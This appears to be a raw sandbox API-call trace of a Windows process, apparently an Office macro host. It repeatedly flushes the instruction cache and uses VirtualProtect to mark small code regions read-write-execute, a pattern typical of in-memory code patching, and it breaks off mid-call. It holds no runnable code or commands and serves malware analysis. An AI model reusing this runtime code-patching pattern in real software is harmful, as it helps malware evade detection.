GetAsyncKeyState (vKey=3) returned 0 [0111.971] CRetailMalloc_Alloc () returned 0xcb95310 [0111.971] memcpy (in: _Dst=0xd015168, _Src=0x1977bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.971] memcpy (in: _Dst=0xcb95330, _Src=0x197824, _Size=0x18 | out: _Dst=0xcb95330) returned 0xcb95330 [0111.971] CRetailMalloc_Realloc () returned 0xcb95310 [0111.971] CRetailMalloc_Free () returned 0x1 [0111.971] GetCurrentProcess () returned 0xffffffff [0111.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0111.971] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.972] GetCurrentProcess () returned 0xffffffff [0111.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0111.972] GetCurrentProcess () returned 0xffffffff [0111.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0111.972] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.972] GetCurrentProcess () returned 0xffffffff [0111.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0111.972] GetCurrentProcess () returned 0xffffffff [0111.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0111.972] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.973] GetCurrentProcess () returned 0xffffffff [0111.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0111.973] GetCurrentProcess () returned 0xffffffff [0111.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0111.973] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.973] GetCurrentProcess () returned 0xffffffff [0111.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0111.973] GetCurrentProcess () returned 0xffffffff [0111.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0111.973] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.974] GetCurrentProcess () returned 0xffffffff [0111.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0111.974] GetCurrentProcess () returned 0xffffffff [0111.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0111.974] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.974] GetCurrentProcess () returned 0xffffffff [0111.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0111.974] GetCurrentProcess () returned 0xffffffff [0111.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0111.974] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.975] GetCurrentProcess () returned 0xffffffff [0111.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0111.975] GetCurrentProcess () returned 0xffffffff [0111.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0111.975] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.975] GetCurrentProcess () returned 0xffffffff [0111.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0111.975] GetCurrentProcess () returned 0xffffffff [0111.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0111.976] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.976] GetCurrentProcess () returned 0xffffffff [0111.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0111.976] GetCurrentProcess () returned 0xffffffff [0111.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0111.976] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.976] GetCurrentProcess () returned 0xffffffff [0111.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0111.976] GetCurrentProcess () returned 0xffffffff [0111.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0111.977] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.977] GetCurrentProcess () returned 0xffffffff [0111.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0111.977] GetCurrentProcess () returned 0xffffffff [0111.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0111.977] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.977] GetCurrentProcess () returned 0xffffffff [0111.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0111.978] GetCurrentProcess () returned 0xffffffff [0111.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0111.978] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.978] GetCurrentProcess () returned 0xffffffff [0111.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0111.978] GetCurrentProcess () returned 0xffffffff [0111.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0111.978] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.979] GetCurrentProcess () returned 0xffffffff [0111.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0111.979] GetCurrentProcess () returned 0xffffffff [0111.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0111.979] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.979] GetCurrentProcess () returned 0xffffffff [0111.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0111.979] GetCurrentProcess () returned 0xffffffff [0111.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0111.979] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.980] GetCurrentProcess () returned 0xffffffff [0111.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0111.980] GetCurrentProcess () returned 0xffffffff [0111.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0111.980] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.980] GetCurrentProcess () returned 0xffffffff [0111.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0111.980] GetCurrentProcess () returned 0xffffffff [0111.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0111.980] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.981] GetCurrentProcess () returned 0xffffffff [0111.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0111.981] GetCurrentProcess () returned 0xffffffff [0111.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0111.981] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.981] GetCurrentProcess () returned 0xffffffff [0111.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0111.981] GetCurrentProcess () returned 0xffffffff [0111.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0111.981] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.982] GetCurrentProcess () returned 0xffffffff [0111.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0111.982] GetCurrentProcess () returned 0xffffffff [0111.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0111.982] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.982] GetCurrentProcess () returned 0xffffffff [0111.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0111.982] GetCurrentProcess () returned 0xffffffff [0111.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0111.982] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.983] GetCurrentProcess () returned 0xffffffff [0111.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0111.983] GetCurrentProcess () returned 0xffffffff [0111.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0111.983] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.983] GetCurrentProcess () returned 0xffffffff [0111.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0111.983] GetCurrentProcess () returned 0xffffffff [0111.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0111.983] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.984] GetCurrentProcess () returned 0xffffffff [0111.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0111.984] GetCurrentProcess () returned 0xffffffff [0111.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0111.984] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.984] GetCurrentProcess () returned 0xffffffff [0111.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0111.984] GetCurrentProcess () returned 0xffffffff [0111.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0111.984] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.985] GetCurrentProcess () returned 0xffffffff [0111.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0111.985] GetCurrentProcess () returned 0xffffffff [0111.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0111.985] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.988] GetCurrentProcess () returned 0xffffffff [0111.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0111.988] GetCurrentProcess () returned 0xffffffff [0111.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0111.988] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.988] GetCurrentProcess () returned 0xffffffff [0111.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0111.988] GetCurrentProcess () returned 0xffffffff [0111.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0111.988] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.989] GetCurrentProcess () returned 0xffffffff [0111.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0111.989] GetCurrentProcess () returned 0xffffffff [0111.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0111.989] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.989] GetCurrentProcess () returned 0xffffffff [0111.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0111.989] GetCurrentProcess () returned 0xffffffff [0111.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0111.989] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0111.990] GetCurrentProcess () returned 0xffffffff [0111.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0111.990] GetAsyncKeyState (vKey=3) returned 0 [0111.991] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.991] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.991] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.991] CRetailMalloc_Alloc () returned 0xcb95370 [0111.991] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0111.991] memcpy (in: _Dst=0xcb95390, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb95390) returned 0xcb95390 [0111.991] CRetailMalloc_Realloc () returned 0xcb95370 [0111.991] CRetailMalloc_Free () returned 0x1 [0111.991] GetCurrentProcess () returned 0xffffffff [0111.991] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0111.991] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.992] GetCurrentProcess () returned 0xffffffff [0111.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0111.992] GetCurrentProcess () returned 0xffffffff [0111.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0111.992] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.992] GetCurrentProcess () returned 0xffffffff [0111.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0111.992] GetCurrentProcess () returned 0xffffffff [0111.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0111.992] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.993] GetCurrentProcess () returned 0xffffffff [0111.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0111.993] GetCurrentProcess () returned 0xffffffff [0111.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0111.993] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.993] GetCurrentProcess () returned 0xffffffff [0111.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0111.993] GetCurrentProcess () returned 0xffffffff [0111.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0111.993] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.994] GetCurrentProcess () returned 0xffffffff [0111.994] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0111.994] GetCurrentProcess () returned 0xffffffff [0111.994] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0111.994] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.994] GetCurrentProcess () returned 0xffffffff [0111.994] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0111.994] GetCurrentProcess () returned 0xffffffff [0111.994] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0111.994] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.995] GetCurrentProcess () returned 0xffffffff [0111.995] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0111.995] GetCurrentProcess () returned 0xffffffff [0111.995] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0111.995] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.995] GetCurrentProcess () returned 0xffffffff [0111.995] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0111.995] GetCurrentProcess () returned 0xffffffff [0111.995] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0111.995] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.996] GetCurrentProcess () returned 0xffffffff [0111.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0111.996] GetCurrentProcess () returned 0xffffffff [0111.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0111.996] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.996] GetCurrentProcess () returned 0xffffffff [0111.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0111.996] GetCurrentProcess () returned 0xffffffff [0111.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0111.996] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.997] GetCurrentProcess () returned 0xffffffff [0111.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0111.997] GetCurrentProcess () returned 0xffffffff [0111.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0111.997] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.997] GetCurrentProcess () returned 0xffffffff [0111.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0111.997] GetCurrentProcess () returned 0xffffffff [0111.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0111.997] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.998] GetCurrentProcess () returned 0xffffffff [0111.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0111.998] GetCurrentProcess () returned 0xffffffff [0111.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0111.998] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.998] GetCurrentProcess () returned 0xffffffff [0111.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0111.998] GetCurrentProcess () returned 0xffffffff [0111.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0111.998] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.999] GetCurrentProcess () returned 0xffffffff [0111.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0111.999] GetCurrentProcess () returned 0xffffffff [0111.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0111.999] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0111.999] GetCurrentProcess () returned 0xffffffff [0111.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0111.999] GetCurrentProcess () returned 0xffffffff [0111.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0111.999] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.000] GetCurrentProcess () returned 0xffffffff [0112.000] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.000] GetCurrentProcess () returned 0xffffffff [0112.000] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.000] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.000] GetCurrentProcess () returned 0xffffffff [0112.000] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.000] GetCurrentProcess () returned 0xffffffff [0112.000] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.000] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.001] GetCurrentProcess () returned 0xffffffff [0112.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.001] GetCurrentProcess () returned 0xffffffff [0112.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.001] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.001] GetCurrentProcess () returned 0xffffffff [0112.007] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.007] GetCurrentProcess () returned 0xffffffff [0112.007] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.007] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.008] GetCurrentProcess () returned 0xffffffff [0112.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.008] GetCurrentProcess () returned 0xffffffff [0112.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.008] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.008] GetCurrentProcess () returned 0xffffffff [0112.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.008] GetCurrentProcess () returned 0xffffffff [0112.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.009] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.009] GetCurrentProcess () returned 0xffffffff [0112.009] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.009] GetCurrentProcess () returned 0xffffffff [0112.009] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.009] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.010] GetCurrentProcess () returned 0xffffffff [0112.010] FlushInstructionCache (hProcess=0xffffffff, 